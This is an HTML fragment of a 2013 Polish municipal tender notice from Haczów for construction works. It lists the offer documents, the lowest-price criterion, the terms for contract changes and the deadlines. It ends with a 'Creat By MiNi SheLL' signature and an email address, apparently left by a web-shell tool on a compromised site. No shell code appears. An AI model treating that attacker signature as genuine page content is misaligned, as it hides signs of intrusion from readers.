j) pełnomocnictwo jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym oraz w przypadku podmiotów występujących wspólnie.
k) ponadto w przypadku  zlecenia wykonania  robót  bądź części robót  podwykonawcy/ podwykonawcom , wskazanie części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom. Brak oświadczenia w sprawie powierzenia wykonania części zamówienia podwykonawcom, uznany będzie za zobowiązanie do samodzielnego wykonania zamówienia.
l)kosztorys  ofertowy  (szczegółowy)  sporządzony  na  podstawie   przedmiaru  robót.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć osób odpowiedzialnych  z ramienia Wykonawcy i Zamawiającego do  koordynowania prowadzonych robót z przyczyn  niezależnych zarówno w stosunku do projektowanych w Dokumentacji projektowej ( podnoszących jakość technologiczną), danych adresowych  wykonawcy, terminu wykonania zamówienia w przypadku wystąpienia  niesprzyjających warunków atmosferycznych, wstrzymania robót lub przerw w pracach, powstałych z przyczyn leżących po stronie Zama?wiającego, wstrzymania robót, na mocy decyzji organów uprawnionych do wstrzymania lub przerwania robót, z przyczyn niezależnych od Zamawiającego lub Wykonawcy, wstrzymania robót na mocy decyzji Zamawiającego lub innych organów, z przyczyn innych, niż związane z błędnym sposobem realizacji robót przez Wykonawcę, użyciem przez niego wadliwych materiałów, urządzeń lub elementów wyposażenia, czy też naruszeniem przez Wy?konawcę przepisów prawa, wystąpienia w trakcie wykonywania robót kolizji z sieciami lub innymi przeszkodami, które nie były możliwe do przewidzenia po przeanalizowaniu dostarczonego Wykonawcy przez Za?mawiającego projektu budowlanego, wykonawczego, zmiany stawki podatku VAT oraz uzgodnień, wystąpienia siły wyższej, przy czym za siłę wyższą uważa się wszystkie zdarzenia, jakich nie da się przewidzieć w chwili zawarcia umowy i na które żadna ze stron nie będzie miała wpływu,  w szczególności: 	działania wojenne, rozruchy, klęska żywiołowa,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Haczów, 36-213 Haczów  nr 573, pokój  nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2013 godzina 09:00, miejsce: Urząd Gminy Haczów, 36-213 Haczów  nr 573, pokój  nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze postępowanie   prowadzone jest   w ramach osi priorytetowej  II-VII Regionalnego Programu Operacyjnego  Województwa  Podkarpackiego  na lata  2007 - 2013  ( działanie 2.2 Infrastruktura  energetyczna).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com